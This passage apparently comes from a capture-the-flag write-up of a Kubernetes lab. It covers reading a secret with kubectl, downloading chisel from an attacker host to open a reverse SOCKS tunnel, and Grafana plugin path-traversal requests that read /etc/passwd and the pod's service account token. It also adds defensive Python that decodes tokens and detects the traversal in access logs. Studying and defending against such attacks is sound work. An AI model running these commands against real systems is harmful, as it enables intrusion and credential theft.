challenge@syringe-79b66d66d7-6xdjz:/tmp$ ll
ll
total 48724
drwxrwxrwt 1 root root 4096 Dec 13 16:27 ./
drwxr-xr-x 1 root root 4096 Dec 13 16:22 ../
-rw-r--r-- 1 challenge challenge 49885184 Dec 13 16:28 kubectl
challenge@syringe-79b66d66d7-6xdjz:/tmp$ chmod +x kubectl
chmod +x kubectl
challenge@syringe-79b66d66d7-6xdjz:/tmp$ ll
ll
total 48724
drwxrwxrwt 1 root root 4096 Dec 13 16:27 ./
drwxr-xr-x 1 root root 4096 Dec 13 16:22 ../
-rwxr-xr-x 1 challenge challenge 49885184 Dec 13 16:28 kubectl*
challenge@syringe-79b66d66d7-6xdjz:/tmp$
```

./kubectl get pods fails with a forbidden error.

Check the permissions of the current service account:

```
./kubectl auth can-i --list
```

List the secrets to get the second flag:

```
./kubectl get secrets
./kubectl get secrets secretflag -o json
```

The secret value is base64 encoded:

```
ZmxhZ3tkZjJhNjM2ZGUxNTEwOGE0ZGM0MTEzNWQ5MzBkOGVjMX0=
```
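Two things on this page come back base64-encoded and are worth decoding programmatically rather than by eye: the `.data` values of a Secret (Task 4, above) and the service account JWT that Task 6 has you read out of the Grafana pod. As an added example (my code, not the room's), the Python below decodes a Secret's data map and reads the claims of a service account token to tell which namespace and account it belongs to, which is the first thing an incident responder wants to know about a token found in the wrong place. The signature is deliberately not verified (the cluster's signing key is not available here); the token is constructed, and the `flag` data key of the page's `secretflag` Secret is an assumption.

```python
import base64
import json


def b64url_decode(segment: str) -> bytes:
    """JWT segments are base64url without padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_secret(secret: dict) -> dict:
    """Decode the .data map of a Secret as returned by kubectl get secret ... -o json."""
    return {
        key: base64.b64decode(value).decode("utf-8", "replace")
        for key, value in secret.get("data", {}).items()
    }


def jwt_claims(token: str) -> dict:
    """Read a JWT payload without verifying the signature (inspection only)."""
    parts = token.strip().split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS token")
    return json.loads(b64url_decode(parts[1]))


def service_account_identity(token: str):
    """(namespace, name) from the sub claim, or None if it is not a service account token."""
    sub = jwt_claims(token).get("sub", "")
    prefix = "system:serviceaccount:"
    if not sub.startswith(prefix):
        return None
    namespace, _, name = sub[len(prefix):].partition(":")
    return namespace, name


def build_sample_token(namespace: str, name: str) -> str:
    """Constructed token with the claim layout of a service account JWT and a dummy signature."""
    def enc(obj) -> str:
        raw = json.dumps(obj, separators=(",", ":")).encode()
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

    header = {"alg": "RS256", "kid": "constructed-key-id"}
    payload = {
        "iss": "kubernetes/serviceaccount",
        "sub": f"system:serviceaccount:{namespace}:{name}",
        "kubernetes.io/serviceaccount/namespace": namespace,
        "kubernetes.io/serviceaccount/service-account.name": name,
    }
    signature = base64.urlsafe_b64encode(b"\x00" * 32).rstrip(b"=").decode()
    return f"{enc(header)}.{enc(payload)}.{signature}"


# The page's secretflag value; the data key name "flag" is assumed.
SAMPLE_SECRET = {
    "apiVersion": "v1", "kind": "Secret",
    "metadata": {"name": "secretflag", "namespace": "default"},
    "data": {"flag": "ZmxhZ3tkZjJhNjM2ZGUxNTEwOGE0ZGM0MTEzNWQ5MzBkOGVjMX0="},
}


if __name__ == "__main__":
    print(decode_secret(SAMPLE_SECRET))
    print(service_account_identity(build_sample_token("default", "grafana")))
```

Once the owning account is known, `kubectl auth can-i --list --token <token>` (as used on this page) shows what the token can do, and `kubectl delete secret` or a rotation of the service account revokes it.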

The environment variables leak the Grafana service address, 10.105.120.1:3000; that instance is version 8.3.0-beta2 (8d74cc357). Set up a proxy into the cluster and use the same file-read exploit to read the service account token.

On the attacker machine:

```bash
cd /home/kali/Desktop && python3 -m http.server 8080
./chisel server -p 28190 --reverse
```

In the compromised pod:

```bash
curl -o /tmp/chisel http://10.9.155.83:8080/chisel
cd /tmp && chmod +x chisel
./chisel client 10.9.155.83:28190 R:0.0.0.0:28191:socks
```

Back on the attacker machine, point proxychains at the SOCKS port and send the requests through it:

```bash
vim /etc/proxychains4.conf
proxychains4 -f /etc/proxychains4.conf python3
proxychains4 -f /etc/proxychains4.conf firefox
proxychains4 -f /etc/proxychains4.conf burpsuite

proxychains4 -f /etc/proxychains4.conf curl http://10.105.120.1:3000/public/plugins/alertlist/../../../../../../../../etc/passwd --cookie "grafana_session=749c76365cf448fb8ddfd1b78af3881e"

proxychains4 -f /etc/proxychains4.conf curl http://10.105.120.1:3000/public/plugins/alertlist/../../../../../../../../etc/passwd --cookie "redirect_to=%2F;grafana_session=749c76365cf448fb8ddfd1b78af3881e"

proxychains4 -f /etc/proxychains4.conf curl http://10.105.120.1:3000/public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/passwd

proxychains4 -f /etc/proxychains4.conf curl http://10.105.120.1:3000/public/plugins/alertlist/../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token

proxychains4 -f /etc/proxychains4.conf curl http://10.105.120.1:3000/public%2Fplugins%2Falertlist%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fvar%2Frun%2Fsecrets%2Fkubernetes%2Eio%2Fserviceaccount%2Ftoken
```
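Both Grafana instances on this page (port 3000 on the first machine and the in-cluster service here) are hit through the same plugin-asset path traversal, and the requests leave a very recognisable trace in the access log. As an added example (my code, not the room's), this Python scans log lines for plugin requests whose path climbs out of the plugin directory, handles the percent-encoded `%2E%2E%2F` form used in the last request above and double encoding, and reports the file each request actually resolved to. The log lines are constructed in combined log format using the request paths seen on this page; Grafana's own log format differs, so adjust `LOG_RE` to whatever sits in front of it.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Grafana serves plugin static files under /public/plugins/<plugin-id>/<file>; the bug
# exploited on this page is that <file> was not confined to the plugin directory.
PLUGIN_PATH_RE = re.compile(r"^/public/plugins/([^/]+)/(.*)$")
# Combined log format (constructed sample format, not Grafana's own log).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def fully_decode(path: str, rounds: int = 3) -> str:
    """Percent-decode until stable so %2E%2E%2F and double encoding are seen as '../'."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def plugin_traversal_target(request_path: str):
    """Return the file a traversing plugin-asset request would reach, or None if benign."""
    path = fully_decode(urlsplit(request_path).path)
    m = PLUGIN_PATH_RE.match(path)
    if not m or ".." not in m.group(2).split("/"):
        return None
    return posixpath.normpath(path)  # collapses the ../ run to show the real target


def scan_access_log(lines) -> list:
    """Flag log lines whose request is a plugin path traversal; returns one dict per hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, when, method, path, status = m.groups()
        target = plugin_traversal_target(path)
        if target is not None:
            hits.append({"client": client, "time": when, "method": method,
                         "status": int(status), "path": path, "resolved": target})
    return hits


# Constructed sample log lines using the request paths seen in this writeup.
ENCODED_REQUEST = "/public%2Fplugins%2Falertlist%2F" + "%2E%2E%2F" * 8 + "etc%2Fpasswd"
SAMPLE_LOG = [
    '10.9.155.83 - - [06/Dec/2023:15:06:17 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 4512',
    '10.9.155.83 - - [06/Dec/2023:15:06:18 +0000] "GET /public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 1231',
    '10.9.155.83 - - [06/Dec/2023:15:06:19 +0000] "GET /public/plugins/alertlist/../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token HTTP/1.1" 200 1024',
    f'10.9.155.83 - - [06/Dec/2023:15:06:20 +0000] "GET {ENCODED_REQUEST} HTTP/1.1" 200 1231',
]


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} {hit['status']} -> {hit['resolved']}")
```

A 200 on a resolved `/var/run/secrets/kubernetes.io/serviceaccount/token` is the signal that the pod's token is out and should be rotated; the other mitigation this page implies is that a Grafana pod does not need a mounted service account token at all (`automountServiceAccountToken: false`), which would have stopped Task 6 even with the file read in place.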

It’s 1:40 am, but it still fails. Sleep!
